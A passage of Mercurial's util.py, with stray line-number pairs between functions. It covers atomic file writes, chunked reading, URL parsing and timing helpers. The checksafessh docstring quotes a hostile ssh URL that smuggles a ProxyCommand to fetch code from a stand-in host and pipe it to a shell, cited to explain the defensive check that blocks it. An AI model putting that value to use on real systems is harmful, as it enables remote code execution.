        ifp.close()
        ofp.close()
    except: # re-raises
        # don't leave a partially-written temp file behind
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
2372 2374
2373 2375
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """

    def __init__(self, stat):
        # raw os.stat() result, or None for a nonexistent path
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for ``path``, tolerating a missing file."""
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an already-open file object."""
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (
                self.stat.st_size == old.stat.st_size
                and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
                and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
            )
        except AttributeError:
            # at least one side has stat = None (nonexistent file)
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            # 'old' isn't a filestat-like object at all
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # advance mtime by one second, wrapping to stay within 32 bits
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
2478 2480
2479 2481
class atomictempfile(object):
    """writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    """

    def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
        self.__name = name  # permanent name
        # writes go to a temporary sibling, renamed over the real file
        # in close()
        self._tempname = mktempcopy(
            name,
            emptyok=(b'w' in mode),
            createmode=createmode,
            enforcewritable=(b'w' in mode),
        )

        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        """Publish the written content under the permanent name."""
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        """Throw away the temporary file; the original is untouched."""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'):  # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # keep the result only on a clean exit
        if exctype is not None:
            self.discard()
        else:
            self.close()
2548 2550
2549 2551
def unlinkpath(f, ignoremissing=False, rmdir=True):
    # type: (bytes, bool, bool) -> None
    """unlink and remove the directory if it is empty"""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    if not rmdir:
        return
    # prune any parent directories the removal may have left empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2563 2565
2564 2566
def tryunlink(f):
    # type: (bytes) -> None
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as err:
        if err.errno == errno.ENOENT:
            return
        raise
2573 2575
2574 2576
def makedirs(name, mode=None, notindexed=False):
    # type: (bytes, Optional[int], bool) -> None
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root without success
            raise
        # create the missing ancestors first, then retry
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
2603 2605
2604 2606
def readfile(path):
    # type: (bytes) -> bytes
    """Return the entire binary contents of the file at *path*."""
    fp = open(path, b'rb')
    try:
        return fp.read()
    finally:
        fp.close()
2609 2611
2610 2612
def writefile(path, text):
    # type: (bytes, bytes) -> None
    """Replace the file at *path* with *text* (binary mode)."""
    fp = open(path, b'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
2615 2617
2616 2618
def appendfile(path, text):
    # type: (bytes, bytes) -> None
    """Append *text* to the file at *path* (binary mode)."""
    fp = open(path, b'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
2621 2623
2622 2624
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""

        def splitbig(chunks):
            # split very large incoming chunks (>1MB) into 256k pieces so
            # the buffering in read() stays bounded
            for chunk in chunks:
                if len(chunk) > 2 ** 20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk

        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        # read offset into the chunk at the head of self._queue
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            # NOTE(review): this drains only the underlying iterator; data
            # already buffered in self._queue by an earlier sized read is
            # not included -- callers appear to use either sized reads or
            # a single read-all, not both. TODO confirm.
            return b''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2 ** 18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset : offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return b''.join(buf)
2704 2706
2705 2707
def filechunkiter(f, size=131072, limit=None):
    """Generate chunks of up to *size* bytes read from file object *f*.

    Stops at EOF, or after *limit* total bytes when a limit is given
    (default is to read all data). Chunks may be shorter than *size*
    for the final chunk, or when *f* is a socket or other file type
    that sometimes returns short reads.
    """
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # nbytes == 0 short-circuits to avoid a pointless read() call
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
2726 2728
2727 2729
class cappedreader(object):
    """Proxy exposing at most N bytes of an underlying file object.

    Attempts to read past the configured limit behave as EOF.

    The wrapped file must not be read through any other path while this
    proxy is in use, or the internal accounting will drift and results
    become unpredictable.
    """

    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        remaining = self._left
        if not remaining:
            return b''

        if n < 0:
            # read everything that is still permitted
            n = remaining

        data = self._fh.read(min(n, remaining))
        self._left = remaining - len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0 : len(res)] = res
        return len(res)
2765 2767
2766 2768
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        # use the first unit whose threshold the magnitude reaches; the
        # last table entry acts as the fallback for small values
        for multiplier, divisor, fmt in unittable:
            if abs(count) >= divisor * multiplier:
                return fmt % (count / float(divisor))
        return unittable[-1][2] % count

    return go
2777 2779
2778 2780
def processlinerange(fromline, toline):
    # type: (int, int) -> Tuple[int, int]
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
    ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
    ...
    ParseError: fromline must be strictly positive
    """
    if toline < fromline:
        raise error.ParseError(_(b"line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_(b"fromline must be strictly positive"))
    # convert the 1-based inclusive start to a 0-based half-open range
    return fromline - 1, toline
2800 2802
2801 2803
# Render a byte quantity with a human-readable unit (GB/MB/KB/bytes);
# larger magnitudes within a unit get fewer decimal places.
bytecount = unitcountfn(
    (100, 1 << 30, _(b'%.0f GB')),
    (10, 1 << 30, _(b'%.1f GB')),
    (1, 1 << 30, _(b'%.2f GB')),
    (100, 1 << 20, _(b'%.0f MB')),
    (10, 1 << 20, _(b'%.1f MB')),
    (1, 1 << 20, _(b'%.2f MB')),
    (100, 1 << 10, _(b'%.0f KB')),
    (10, 1 << 10, _(b'%.1f KB')),
    (1, 1 << 10, _(b'%.2f KB')),
    (1, 1, _(b'%.0f bytes')),
)
2814 2816
2815 2817
class transformingwriter(object):
    """Writable file wrapper that runs all written data through a
    transform function before handing it to the underlying file."""

    def __init__(self, fp, encode):
        self._dest = fp
        self._transform = encode

    def close(self):
        self._dest.close()

    def flush(self):
        self._dest.flush()

    def write(self, data):
        encoded = self._transform(data)
        return self._dest.write(encoded)
2831 2833
2832 2834
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error. Used by tolf()/tocrlf() below.
_eolre = remod.compile(br'\r*\n')
2837 2839
2838 2840
def tolf(s):
    # type: (bytes) -> bytes
    """Normalize line endings in ``s`` to LF."""
    return _eolre.sub(b'\n', s)
2842 2844
2843 2845
def tocrlf(s):
    # type: (bytes) -> bytes
    """Normalize line endings in ``s`` to CRLF."""
    return _eolre.sub(b'\r\n', s)
2847 2849
2848 2850
def _crlfwriter(fp):
    """Wrap ``fp`` so written data has its line endings converted to CRLF."""
    return transformingwriter(fp, tocrlf)
2851 2853
2852 2854
if pycompat.oslinesep == b'\r\n':
    # CRLF platform (Windows): convert on the way in and out
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    # LF platform: native form is already LF, so no conversion is needed
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity
2861 2863
if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
    3,
    0,
):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" work fine, as we do not support Python < 2.7.4.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.

    def iterfile(fp):
        """Return a line iterator over ``fp`` that tolerates EINTR."""
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            # fp.readline deals with EINTR correctly, use it as a workaround.
            return iter(fp.readline, b'')


else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        """Return ``fp`` itself; its line iteration is EINTR-safe here."""
        return fp
2906 2908
2907 2909
def iterlines(iterator):
    # type: (Iterator[bytes]) -> Iterator[bytes]
    """Flatten an iterator of byte chunks into its individual lines."""
    for chunk in iterator:
        lines = chunk.splitlines()
        for line in lines:
            yield line
2913 2915
2914 2916
def expandpath(path):
    # type: (bytes) -> bytes
    """Expand environment variables and ``~`` constructs in ``path``."""
    expanded = os.path.expandvars(path)
    return os.path.expanduser(expanded)
2918 2920
2919 2921
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda t: t)
    patterns = b'|'.join(mapping.keys())
    if escape_prefix:
        # let the doubled prefix stand for a literal prefix character
        patterns += b'|' + prefix
        prefix_char = prefix[1:] if len(prefix) > 1 else prefix
        mapping[prefix_char] = prefix_char
    matcher = remod.compile(br'%s(%s)' % (prefix, patterns))
    # m.group() includes the prefix character; strip it to get the key
    return matcher.sub(lambda m: fn(mapping[m.group()[1:]]), s)
2944 2946
2945 2947
def getport(port):
    # type: (Union[bytes, int]) -> int
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        # handles ints as well as numeric strings/bytes
        return int(port)
    except ValueError:
        # not numeric; resolve it as a service name instead
        try:
            return socket.getservbyname(pycompat.sysstr(port))
        except socket.error:
            raise error.Abort(
                _(b"no port number associated with service '%s'") % port
            )
2965 2967
2966 2968
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters left unescaped when quoting user/passwd in __bytes__
    _safechars = b"!~*'()+"
    # characters left unescaped when quoting path/fragment in __bytes__
    _safepchars = b"/!~*'()+:\\"
    # matches a leading URL scheme, e.g. b'http:' or b'svn+ssh:'
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # type: (bytes, bool, bool) -> None
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        # True while the value still looks like a plain local path
        # (no scheme was recognized)
        self._localpath = True
        self._hostport = b''
        # original input, preserved verbatim for localpath() fallback
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                # no scheme: the whole remainder is the path
                self.path = path
                return

            if parsequery and b'?' in path:
                path, self.query = path.split(b'?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith(b'//'):
                parts = path[2:].split(b'/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = b'/' + path

            if self.host and b'@' in self.host:
                self.user, self.host = self.host.rsplit(b'@', 1)
                if b':' in self.user:
                    self.user, self.passwd = self.user.split(b':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (
                self.host
                and b':' in self.host
                and not (
                    self.host.startswith(b'[') and self.host.endswith(b']')
                )
            ):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(b':', 1)
                if not self.host:
                    self.host = None

            if (
                self.host
                and self.scheme == b'file'
                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
            ):
                raise error.Abort(
                    _(b'file:// URLs can only refer to localhost')
                )

        self.path = path

        # leave the query string escaped
        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def copy(self):
        """Return a new url instance with the same components as this one."""
        u = url(b'temporary useless value')
        u.path = self.path
        u.scheme = self.scheme
        u.user = self.user
        u.passwd = self.passwd
        u.host = self.host
        # NOTE(review): path is assigned twice (also above); harmless but
        # redundant
        u.path = self.path
        u.query = self.query
        u.fragment = self.fragment
        u._localpath = self._localpath
        u._hostport = self._hostport
        u._origpath = self._origpath
        return u

    @encoding.strmethod
    def __repr__(self):
        # only components that were actually parsed are shown
        attrs = []
        for a in (
            b'scheme',
            b'user',
            b'passwd',
            b'host',
            b'port',
            b'path',
            b'query',
            b'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            # bracketed IPv6 literals must not be percent-quoted
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return (url-without-credentials, authinfo-tuple-or-None)."""
        user, passwd = self.user, self.passwd
        try:
            # temporarily strip credentials so bytes(self) omits them
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self):
        """Report whether this URL/path cannot be joined onto a base."""
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self):
        # type: () -> bytes
        """Return a local filesystem path for file:/bundle: URLs,
        otherwise the original input string."""
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )
3310 3312
3311 3313
def hasscheme(path):
    # type: (bytes) -> bool
    """Report whether *path* parses with an explicit URL scheme."""
    parsed = url(path)
    # cast to bool to help pytype (scheme is Optional[bytes])
    return bool(parsed.scheme)
3315 3317
3316 3318
def hasdriveletter(path):
    # type: (bytes) -> bool
    """True for Windows-style paths beginning with a drive letter (b'c:...')."""
    if not path:
        return False
    return path[0:1].isalpha() and path[1:2] == b':'
3320 3322
3321 3323
def urllocalpath(path):
    # type: (bytes) -> bytes
    """Return the local path for *path*, treating '?' and '#' as literal."""
    u = url(path, parsequery=False, parsefragment=False)
    return u.localpath()
3325 3327
3326 3328
def checksafessh(path):
    # type: (bytes) -> None
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    unquoted = urlreq.unquote(path)
    # a '-' right after the scheme would be parsed by ssh as an option
    if unquoted.startswith((b'ssh://-', b'svn+ssh://-')):
        raise error.Abort(
            _(b'potentially unsafe url: %r') % (pycompat.bytestr(unquoted),)
        )
3343 3345
3344 3346
def hidepassword(u):
    # type: (bytes) -> bytes
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = b'***'
    return bytes(parsed)
3352 3354
3353 3355
def removeauth(u):
    # type: (bytes) -> bytes
    '''remove all authentication information from a url string'''
    parsed = url(u)
    parsed.user = None
    parsed.passwd = None
    return bytes(parsed)
3360 3362
3361 3363
# Format a duration given in seconds, presumably choosing among the unit
# specs below (seconds down to nanoseconds) so the value keeps a sensible
# number of significant digits — see unitcountfn for the selection rule.
timecount = unitcountfn(
    (1, 1e3, _(b'%.0f s')),
    (100, 1, _(b'%.1f s')),
    (10, 1, _(b'%.2f s')),
    (1, 1, _(b'%.3f s')),
    (100, 0.001, _(b'%.1f ms')),
    (10, 0.001, _(b'%.2f ms')),
    (1, 0.001, _(b'%.3f ms')),
    (100, 0.000001, _(b'%.1f us')),
    (10, 0.000001, _(b'%.2f us')),
    (1, 0.000001, _(b'%.3f us')),
    (100, 0.000000001, _(b'%.1f ns')),
    (10, 0.000000001, _(b'%.2f ns')),
    (1, 0.000000001, _(b'%.3f ns')),
)
3377 3379
3378 3380
@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution are
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # elapsed seconds as a float; stays 0 until the context is exited
    elapsed = attr.ib(default=0)
    # nesting depth of timedcm context managers
    level = attr.ib(default=1)

    def __bytes__(self):
        if self.elapsed:
            return timecount(self.elapsed)
        return b'<unknown>'

    __str__ = encoding.strmethod(__bytes__)
3396 3398
3397 3399
@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering a timedcmstats instance is produced.

    This context manager is reentrant.

    """
    # bump the nesting counter so nested uses indent their reports
    timedcm._nested += 1
    stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield stats
    finally:
        # record elapsed time even if the body raised
        stats.elapsed = timer() - stats.start
        timedcm._nested -= 1


timedcm._nested = 0
3419 3421
3420 3422
def timed(func):
    """Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    """

    def wrapper(*args, **kwargs):
        fname = pycompat.bytestr(func.__name__)
        with timedcm(fname) as stats:
            ret = func(*args, **kwargs)
        # indent by nesting level so nested timed calls read like a tree
        indent = b' ' * stats.level * 2
        procutil.stderr.write(b'%s%s: %s\n' % (indent, fname, stats))
        return ret

    return wrapper
3447 3449
3448 3450
